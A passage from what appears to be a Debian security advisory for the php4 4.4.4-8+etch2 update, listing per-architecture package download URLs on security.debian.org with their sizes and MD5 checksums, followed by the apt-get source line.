4a3d0ca240fb8fd15262229f9905da55\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.4.4-8+etch2_alpha.deb\n Size/MD5 checksum: 35280 d73325a2229e6a51a4032fa96ab729ab\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.4.4-8+etch2_alpha.deb\n Size/MD5 checksum: 18706 9cfd91acf0f602d0ecb63755b115e68a\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.4.4-8+etch2_alpha.deb\n Size/MD5 checksum: 14610 fdea25694a1717459fbac402d0d83e4b\n http://security.debian.org/pool/updates/main/p/php4/php4-mcrypt_4.4.4-8+etch2_alpha.deb\n Size/MD5 checksum: 13962 4c20b54b031ccdff8cf0ca196ae49bbe\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.4.4-8+etch2_alpha.deb\n Size/MD5 checksum: 5316 e5b16298d568fb7c3db70a1257dbed4b\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.4.4-8+etch2_alpha.deb\n Size/MD5 checksum: 20546 44433db159ce2055eda156352e915036\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.4.4-8+etch2_alpha.deb\n Size/MD5 checksum: 25460 63b6c0c5e0b7f2f271b21f05e0138dfe\n http://security.debian.org/pool/updates/main/p/php4/php4-pgsql_4.4.4-8+etch2_alpha.deb\n Size/MD5 checksum: 37336 0254818c114152834e45ccb8edbb216d\n http://security.debian.org/pool/updates/main/p/php4/php4-pspell_4.4.4-8+etch2_alpha.deb\n Size/MD5 checksum: 8888 46e9aee043bdb6388a1e347358771d92\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.4.4-8+etch2_alpha.deb\n Size/MD5 checksum: 5006 f058cd10e53c5b31c2a9a364d0ac4b33\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.4.4-8+etch2_alpha.deb\n Size/MD5 checksum: 10980 9c74116baeddc1a85f79af6f4a38f486\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.4.4-8+etch2_alpha.deb\n Size/MD5 checksum: 19650 b50360bc8a4d11143e8b4bbb64f75783\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.4.4-8+etch2_alpha.deb\n Size/MD5 checksum: 14576 a11b82813c14119d2f7220272556a47e\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.4.4-8+etch2_amd64.deb\n Size/MD5 checksum: 1646848 9d271508da7b3ae06647f13135872a83\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.4.4-8+etch2_amd64.deb\n Size/MD5 checksum: 1647864 accc438a407488282fe5b6f803a13b8c\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.4.4-8+etch2_amd64.deb\n Size/MD5 checksum: 3254692 daf6d156987b8d59016d3c2e52effe0a\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.4.4-8+etch2_amd64.deb\n Size/MD5 checksum: 1635340 1ceb7d4bc2bbdcbf1c13b80f317320e7\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.4.4-8+etch2_amd64.deb\n Size/MD5 checksum: 206674 34cbac376d754239e1ed4d5df1202213\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.4.4-8+etch2_amd64.deb\n Size/MD5 checksum: 15808 e38bcdabd21e711bc03100cf5c4931cf\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.4.4-8+etch2_amd64.deb\n Size/MD5 checksum: 201188 9a18453d1a070cdb37f5546a045fa989\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.4.4-8+etch2_amd64.deb\n Size/MD5 checksum: 39478 24462937f3a744106b4ad81d4407557d\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.4.4-8+etch2_amd64.deb\n Size/MD5 checksum: 32334 fb37ee9225a4f1bb588edc79305d8901\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.4.4-8+etch2_amd64.deb\n Size/MD5 checksum: 35258 e5a992bd795f0c4d3de92a200515522a\n http://security.debian.org/pool/updates/main/p/php4/php4-interbase_4.4.4-8+etch2_amd64.deb\n Size/MD5 checksum: 24168 dc4eb1589306847060c1ec3a998e8d53\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.4.4-8+etch2_amd64.deb\n Size/MD5 checksum: 18622 7b1808aa8631b9edebac774032575762\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.4.4-8+etch2_amd64.deb\n Size/MD5 checksum: 15622 1bc9e687cc114b5b87cc45748a004a81\n http://security.debian.org/pool/updates/main/p/php4/php4-mcrypt_4.4.4-8+etch2_amd64.deb\n Size/MD5 checksum: 14024 7282efbf62681b87af448449ab0000a2\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.4.4-8+etch2_amd64.deb\n Size/MD5 checksum: 5246 ef49d36f7228e29afc913e79d9d0190c\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.4.4-8+etch2_amd64.deb\n Size/MD5 checksum: 20580 b7c241e7d359e0341b010789c20488b0\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.4.4-8+etch2_amd64.deb\n Size/MD5 checksum: 26126 e53a56fdc1a4ef2f9b540bc295081e0a\n http://security.debian.org/pool/updates/main/p/php4/php4-pgsql_4.4.4-8+etch2_amd64.deb\n Size/MD5 checksum: 36016 1c57d799e799e6fa3acc646aa83bca6b\n http://security.debian.org/pool/updates/main/p/php4/php4-pspell_4.4.4-8+etch2_amd64.deb\n Size/MD5 checksum: 9258 f4480f2ed2a578dc30d0e0a14f58ebc8\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.4.4-8+etch2_amd64.deb\n Size/MD5 checksum: 4972 529178a3895d7134b9c135ab6f7b667d\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.4.4-8+etch2_amd64.deb\n Size/MD5 checksum: 11030 5d2a6975b4f8980a730648470b50de6e\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.4.4-8+etch2_amd64.deb\n Size/MD5 checksum: 19126 375121679c471a4309cac01a75db36fb\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.4.4-8+etch2_amd64.deb\n Size/MD5 checksum: 14492 6dfd10f810ce3398c207f91053ab92d3\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.4.4-8+etch2_hppa.deb\n Size/MD5 checksum: 1741898 db4b84e1651cf8874d35e9a22cdcc275\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.4.4-8+etch2_hppa.deb\n Size/MD5 checksum: 1743310 882fbadc6574ba7f0a190b4e03dc914c\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.4.4-8+etch2_hppa.deb\n Size/MD5 checksum: 3402194 7a4b62e4e7b5568c360deb716c940a42\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.4.4-8+etch2_hppa.deb\n Size/MD5 checksum: 1711424 32ad2d9aa62bd09117a6b35df7e60861\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.4.4-8+etch2_hppa.deb\n Size/MD5 checksum: 206672 756fcbfc6c20dbd3ccf4dcc240491a5f\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.4.4-8+etch2_hppa.deb\n Size/MD5 checksum: 18140 889f1f3f6cbc1b7200fde1d3c6d43453\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.4.4-8+etch2_hppa.deb\n Size/MD5 checksum: 201276 898508b406eca8022f70c98358a82cc2\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.4.4-8+etch2_hppa.deb\n Size/MD5 checksum: 40560 2c50dc9740062744183b25df3596a432\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.4.4-8+etch2_hppa.deb\n Size/MD5 checksum: 34892 8fa487e861202b6ccd4c25be533427a1\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.4.4-8+etch2_hppa.deb\n Size/MD5 checksum: 38292 9c85a3c29ad74a8942e6750c6facae27\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.4.4-8+etch2_hppa.deb\n Size/MD5 checksum: 20222 52bf304d8bdf226f741d0e5ce3f7d6c1\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.4.4-8+etch2_hppa.deb\n Size/MD5 checksum: 16200 3c0cc023a03f7b292dda79a14fdf7d6e\n http://security.debian.org/pool/updates/main/p/php4/php4-mcrypt_4.4.4-8+etch2_hppa.deb\n Size/MD5 checksum: 15676 6888e8f11db9d2e496470127b40710e6\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.4.4-8+etch2_hppa.deb\n Size/MD5 checksum: 5796 81283d5aebf3d17664b002e2dcfa5d56\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.4.4-8+etch2_hppa.deb\n Size/MD5 checksum: 21252 6a5f22ca73d04ed127081d8048b9a1bd\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.4.4-8+etch2_hppa.deb\n Size/MD5 checksum: 27418 74dace6a114a6e8c5679b5aa4f7d6955\n http://security.debian.org/pool/updates/main/p/php4/php4-pgsql_4.4.4-8+etch2_hppa.deb\n Size/MD5 checksum: 39400 a9bdf7a111e37cb712751e838801fb5b\n http://security.debian.org/pool/updates/main/p/php4/php4-pspell_4.4.4-8+etch2_hppa.deb\n Size/MD5 checksum: 9644 e4f30f55fa7b7b748136bd5389202a09\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.4.4-8+etch2_hppa.deb\n Size/MD5 checksum: 5456 4a2c85ac687b09ffe094e3d59362b83f\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.4.4-8+etch2_hppa.deb\n Size/MD5 checksum: 11552 92474800f35942ee87e35584b2de0a75\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.4.4-8+etch2_hppa.deb\n Size/MD5 checksum: 20638 1b4c010aafb36174d36d8bc4f6fbb4de\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.4.4-8+etch2_hppa.deb\n Size/MD5 checksum: 15656 01c39f82b3ba39f8df4c7469e03c1a05\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.4.4-8+etch2_i386.deb\n Size/MD5 checksum: 1595272 f6b3ab3222f83cbf75f577248aee1087\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.4.4-8+etch2_i386.deb\n Size/MD5 checksum: 1596798 cec7ac4cbab8d7565d699acbe9e68998\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.4.4-8+etch2_i386.deb\n Size/MD5 checksum: 3175408 455c915590b032e75f0f90c68c39f7a9\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.4.4-8+etch2_i386.deb\n Size/MD5 checksum: 1596654 6a930288e4655d2439f6974d307dd770\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.4.4-8+etch2_i386.deb\n Size/MD5 checksum: 206676 743f2b0a08fffcfa7ab612e6bbd7cc37\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.4.4-8+etch2_i386.deb\n Size/MD5 checksum: 15920 34cb3155e53f1d4055c0831a5e9bc38c\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.4.4-8+etch2_i386.deb\n Size/MD5 checksum: 201168 3620aafdf8b8079d99958fa940239bf6\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.4.4-8+etch2_i386.deb\n Size/MD5 checksum: 35032 07ee9f476bda386d11f5f8d8c3ddcbe8\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.4.4-8+etch2_i386.deb\n Size/MD5 checksum: 29638 8c47e08d7cbeedeae8b2522487054b5a\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.4.4-8+etch2_i386.deb\n Size/MD5 checksum: 33232 4ebacc751c2a446eb578bef9a56ead7b\n http://security.debian.org/pool/updates/main/p/php4/php4-interbase_4.4.4-8+etch2_i386.deb\n Size/MD5 checksum: 23148 f7e325286fbe7d75febf8ade72d03ec3\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.4.4-8+etch2_i386.deb\n Size/MD5 checksum: 17050 8b0ea78a6d8f547826019450246db02f\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.4.4-8+etch2_i386.deb\n Size/MD5 checksum: 14058 8041a27b06f19df4a6c8fa3f56382505\n http://security.debian.org/pool/updates/main/p/php4/php4-mcrypt_4.4.4-8+etch2_i386.deb\n Size/MD5 checksum: 13156 a747fd85802631daa9a83c818b6ce2d0\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.4.4-8+etch2_i386.deb\n Size/MD5 checksum: 5036 3e141df6e0c1dd20b51fb7783aac2291\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.4.4-8+etch2_i386.deb\n Size/MD5 checksum: 18544 5c790509e5c074fdbe07bc614f9cfb04\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.4.4-8+etch2_i386.deb\n Size/MD5 checksum: 24546 b6cda3e759e0e881aec3eeb1bfe7a9ae\n http://security.debian.org/pool/updates/main/p/php4/php4-pgsql_4.4.4-8+etch2_i386.deb\n Size/MD5 checksum: 33832 df9b0ca3554ed3c2be8cf746284773a0\n http://security.debian.org/pool/updates/main/p/php4/php4-pspell_4.4.4-8+etch2_i386.deb\n Size/MD5 checksum: 8430 74387be9eb05087703bdb9e75b44f898\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.4.4-8+etch2_i386.deb\n Size/MD5 checksum: 4754 f0239f514b158e2418543f3e0f9bf4e6\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.4.4-8+etch2_i386.deb\n Size/MD5 checksum: 10256 e7a53228b63aec8df41e1bce1c8ffc47\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.4.4-8+etch2_i386.deb\n Size/MD5 checksum: 18056 f14a8e5a66e602dabf593d2715b093bd\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.4.4-8+etch2_i386.deb\n Size/MD5 checksum: 13192 5b8312c1e70d3e87484da144acd0003f\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.4.4-8+etch2_ia64.deb\n Size/MD5 checksum: 2004894 ab749e0e311549099a702b0062c6f8a0\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.4.4-8+etch2_ia64.deb\n Size/MD5 checksum: 2006788 5028ed94b0eebc921d4f413eb3ae37d4\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.4.4-8+etch2_ia64.deb\n Size/MD5 checksum: 4007736 54b5c44e4f621340765ddebdb63704cd\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.4.4-8+etch2_ia64.deb\n Size/MD5 checksum: 2008990 00566529046003ec3ae24cfe7ec29aa2\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.4.4-8+etch2_ia64.deb\n Size/MD5 checksum: 206668 d28b6a8c16cfae4cfdd01581c0f03084\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.4.4-8+etch2_ia64.deb\n Size/MD5 checksum: 20738 b2895d40d70c94972f5c15b14ba878bb\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.4.4-8+etch2_ia64.deb\n Size/MD5 checksum: 201174 de4d90f9a2cc3c16f9860857dbaa87fd\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.4.4-8+etch2_ia64.deb\n Size/MD5 checksum: 53272 ff2d5575c809ca97af182a16eee48d45\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.4.4-8+etch2_ia64.deb\n Size/MD5 checksum: 44078 b343a57d52652614db1b6f3df71e5d9a\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.4.4-8+etch2_ia64.deb\n Size/MD5 checksum: 45454 0965dc7d3fc9679653cd94f45b0a3c21\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.4.4-8+etch2_ia64.deb\n Size/MD5 checksum: 24170 8d3f2edddeaa7d874ae648eb5582f50a\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.4.4-8+etch2_ia64.deb\n Size/MD5 checksum: 19672 10e5f9e76a716d1d3036e308078e05e2\n http://security.debian.org/pool/updates/main/p/php4/php4-mcrypt_4.4.4-8+etch2_ia64.deb\n Size/MD5 checksum: 17872 822f7784ece29192a8f48eb1d834383f\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.4.4-8+etch2_ia64.deb\n Size/MD5 checksum: 6480 21a782fb775bc4707bedc376d4ce6420\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.4.4-8+etch2_ia64.deb\n Size/MD5 checksum: 26542 74e3c80ba89a42117287aa57ccfdec12\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.4.4-8+etch2_ia64.deb\n Size/MD5 checksum: 35078 aee8e05b9583f43f8672d2a80731eccd\n http://security.debian.org/pool/updates/main/p/php4/php4-pgsql_4.4.4-8+etch2_ia64.deb\n Size/MD5 checksum: 51246 306dc27eaa6dc96d8f613266432da20c\n http://security.debian.org/pool/updates/main/p/php4/php4-pspell_4.4.4-8+etch2_ia64.deb\n Size/MD5 checksum: 11242 8d45f209aba02b115c5359039da3a018\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.4.4-8+etch2_ia64.deb\n Size/MD5 checksum: 6186 93ac21140e18bf281f206baf24a9fab1\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.4.4-8+etch2_ia64.deb\n Size/MD5 checksum: 13812 29e266f9f3494348e9b8ef206cf23bfe\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.4.4-8+etch2_ia64.deb\n Size/MD5 checksum: 26668 5fc50bd5deff61adc220253920e64ed1\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.4.4-8+etch2_ia64.deb\n Size/MD5 checksum: 19102 157ea202d99c6d21fd806a6ed195d662\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.4.4-8+etch2_powerpc.deb\n Size/MD5 checksum: 1647652 befe8bad7c449ee2490b30ce4372d9e6\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.4.4-8+etch2_powerpc.deb\n Size/MD5 checksum: 1648892 d44eb4bf77e9ebc2ac4a885c4cbd85ea\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.4.4-8+etch2_powerpc.deb\n Size/MD5 checksum: 3256780 66349b17fc019cd69d2d68b697692678\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.4.4-8+etch2_powerpc.deb\n Size/MD5 checksum: 1635578 999078d2125f8bc9120fabcf5acc0c40\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.4.4-8+etch2_powerpc.deb\n Size/MD5 checksum: 206686 67e487b96c5093d98552302c080dc456\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.4.4-8+etch2_powerpc.deb\n Size/MD5 checksum: 17798 569e702e11dc463656aaa2f1c27a3988\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.4.4-8+etch2_powerpc.deb\n Size/MD5 checksum: 201192 5f67b85e6a86365a7b78e01b600c498b\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.4.4-8+etch2_powerpc.deb\n Size/MD5 checksum: 37712 5c7f1feb667d89737ca0088e06943f2c\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.4.4-8+etch2_powerpc.deb\n Size/MD5 checksum: 32320 1113bbad7c314e9b7a6206dbff434ed8\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.4.4-8+etch2_powerpc.deb\n Size/MD5 checksum: 34532 d42829e744c489fd8911fe1ebcf36d92\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.4.4-8+etch2_powerpc.deb\n Size/MD5 checksum: 18968 01ceddae00980cc3160e26eae3d2c2d2\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.4.4-8+etch2_powerpc.deb\n Size/MD5 checksum: 15836 ccd27d16fbfc91084604e7216224a7ef\n http://security.debian.org/pool/updates/main/p/php4/php4-mcrypt_4.4.4-8+etch2_powerpc.deb\n Size/MD5 checksum: 15114 bebc4caf1df8586e52705644d4180257\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.4.4-8+etch2_powerpc.deb\n Size/MD5 checksum: 6734 e979f5387b52058ba4416ac0d2921c84\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.4.4-8+etch2_powerpc.deb\n Size/MD5 checksum: 20306 e314ad6c6de13892ba5b50b06f2a2d92\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.4.4-8+etch2_powerpc.deb\n Size/MD5 checksum: 26100 f310054ab13be80a58219b6e4c533833\n http://security.debian.org/pool/updates/main/p/php4/php4-pgsql_4.4.4-8+etch2_powerpc.deb\n Size/MD5 checksum: 36098 8e15c8249f926a9004126770c47a8ebe\n http://security.debian.org/pool/updates/main/p/php4/php4-pspell_4.4.4-8+etch2_powerpc.deb\n Size/MD5 checksum: 10056 3ad99bef49afc5fb58fb461b9104889f\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.4.4-8+etch2_powerpc.deb\n Size/MD5 checksum: 6356 93fb31217c6a87a8cf386127d6ffb9f1\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.4.4-8+etch2_powerpc.deb\n Size/MD5 checksum: 11874 70c9f08fb41f0f46cb6ea15bd6065c9e\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.4.4-8+etch2_powerpc.deb\n Size/MD5 checksum: 19960 374e46e99b31c4ed125123e78a32fa07\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.4.4-8+etch2_powerpc.deb\n Size/MD5 checksum: 15340 1e363824557da7abdbeabdd50467d4d3\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.4.4-8+etch2_s390.deb\n Size/MD5 checksum: 1703728 7a357558fa111d555010b73dca63b98b\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.4.4-8+etch2_s390.deb\n Size/MD5 checksum: 1704602 9aa12379070aaea5055218573bf7fda2\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.4.4-8+etch2_s390.deb\n Size/MD5 checksum: 3350582 12ad275d7fc0463d8e8b421f5ce0a0bf\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.4.4-8+etch2_s390.deb\n Size/MD5 checksum: 1683348 4cbc6f6015d5b440be0750884daa3404\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.4.4-8+etch2_s390.deb\n Size/MD5 checksum: 206666 cad007391ebe3db957e105c9c33f05d6\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.4.4-8+etch2_s390.deb\n Size/MD5 checksum: 15902 7ed5f38e84292c4258fd5bbdfff36657\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.4.4-8+etch2_s390.deb\n Size/MD5 checksum: 201170 9bf433e8ad75c24efbad44f054bd8341\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.4.4-8+etch2_s390.deb\n Size/MD5 checksum: 39108 ba2355ef46d5afdb4b317951649b6beb\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.4.4-8+etch2_s390.deb\n Size/MD5 checksum: 31618 c60a0770e653a29cded76bd507e67b1e\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.4.4-8+etch2_s390.deb\n Size/MD5 checksum: 35520 035cd5b20d08e6d504583e62ab5f60b8\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.4.4-8+etch2_s390.deb\n Size/MD5 checksum: 19172 75959a74edb16edf761b8f9e7affce1f\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.4.4-8+etch2_s390.deb\n Size/MD5 checksum: 14402 e47f68e47beba84c01bf828cc82bf94f\n http://security.debian.org/pool/updates/main/p/php4/php4-mcrypt_4.4.4-8+etch2_s390.deb\n Size/MD5 checksum: 13880 60cf41016cd722d1ca0264d5257b85f4\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.4.4-8+etch2_s390.deb\n Size/MD5 checksum: 5468 7d07521218d106afced0b61a7ff6f32d\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.4.4-8+etch2_s390.deb\n Size/MD5 checksum: 20732 8cfa07811e333937bf84660c96bf650b\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.4.4-8+etch2_s390.deb\n Size/MD5 checksum: 26798 039c24f8758c9c13038fb609b7ac5c54\n http://security.debian.org/pool/updates/main/p/php4/php4-pgsql_4.4.4-8+etch2_s390.deb\n Size/MD5 checksum: 37598 c832e867a76ad0b2a16089fffa17ea74\n http://security.debian.org/pool/updates/main/p/php4/php4-pspell_4.4.4-8+etch2_s390.deb\n Size/MD5 checksum: 9078 8d0bccbba2724513de76463f049e6637\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.4.4-8+etch2_s390.deb\n Size/MD5 checksum: 5102 5255e4d922f0d418425710a7f76ea9f3\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.4.4-8+etch2_s390.deb\n Size/MD5 checksum: 11104 41dda15e11e7c917357c7b7cf8744f06\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.4.4-8+etch2_s390.deb\n Size/MD5 checksum: 19370 4e082af806fb59041f2f668bdcd0c4b5\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.4.4-8+etch2_s390.deb\n Size/MD5 checksum: 14634 d2c47f8c8634059e63fefb76288f8913\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.4.4-8+etch2_sparc.deb\n Size/MD5 checksum: 1599254 5b82e80cd1b4d54e9f6d117ecf091f3e\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.4.4-8+etch2_sparc.deb\n Size/MD5 checksum: 1601104 925d1526e4b38ab7f5e26551d5fd8f66\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.4.4-8+etch2_sparc.deb\n Size/MD5 checksum: 3148360 f49ba54ad3270e0cf423ae97001ff99c\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.4.4-8+etch2_sparc.deb\n Size/MD5 checksum: 1583578 e6961941824dc722a88371b99575f8de\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.4.4-8+etch2_sparc.deb\n Size/MD5 checksum: 206668 80e69d05cc0cdf68ae171e08757cec4a\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.4.4-8+etch2_sparc.deb\n Size/MD5 checksum: 16072 f943df09cd571878145a8f9e91c5dafd\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.4.4-8+etch2_sparc.deb\n Size/MD5 checksum: 201184 afd5c512f9e3b8ee75be5732fb132a6c\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.4.4-8+etch2_sparc.deb\n Size/MD5 checksum: 33634 ee725113957e22d6c9bbd3c1eed76d58\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.4.4-8+etch2_sparc.deb\n Size/MD5 checksum: 28798 6f383b043805b358468d42a136f09eef\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.4.4-8+etch2_sparc.deb\n Size/MD5 checksum: 31566 7f520b76abdea4180498b0653c92dc63\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.4.4-8+etch2_sparc.deb\n Size/MD5 checksum: 16218 0d469be82c1a55b38c8d4ddbead33e4c\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.4.4-8+etch2_sparc.deb\n Size/MD5 checksum: 13494 184d49bb465e292da5f0b8d2dd68941f\n http://security.debian.org/pool/updates/main/p/php4/php4-mcrypt_4.4.4-8+etch2_sparc.deb\n Size/MD5 checksum: 12724 102a9a02542e6f16e645ad3040965143\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.4.4-8+etch2_sparc.deb\n Size/MD5 checksum: 4854 911d9a5a8f0af78ba764c0a80ca02342\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.4.4-8+etch2_sparc.deb\n Size/MD5 checksum: 17806 9fb9e142ecf51381d4f8544446446c24\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.4.4-8+etch2_sparc.deb\n Size/MD5 checksum: 22740 571ef8269d05fc165757a5761f27cb7a\n http://security.debian.org/pool/updates/main/p/php4/php4-pgsql_4.4.4-8+etch2_sparc.deb\n Size/MD5 checksum: 32684 1ed8e513fa34d9fed990a5ce91dfd6e9\n http://security.debian.org/pool/updates/main/p/php4/php4-pspell_4.4.4-8+etch2_sparc.deb\n Size/MD5 checksum: 8114 39ed7ffd8fa1fee0490980372695e32e\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.4.4-8+etch2_sparc.deb\n Size/MD5 checksum: 4644 d69fb303006d4f1ff27279ff763eaae1\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.4.4-8+etch2_sparc.deb\n Size/MD5 checksum: 9774 54b8762b42d851881d243a010281e38c\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.4.4-8+etch2_sparc.deb\n Size/MD5 checksum: 17258 bafd7f25878c2ba06e981d33627ad3a1\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.4.4-8+etch2_sparc.deb\n Size/MD5 checksum: 12854 774d7d13e4af5448ace5459fb948ffa7\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: 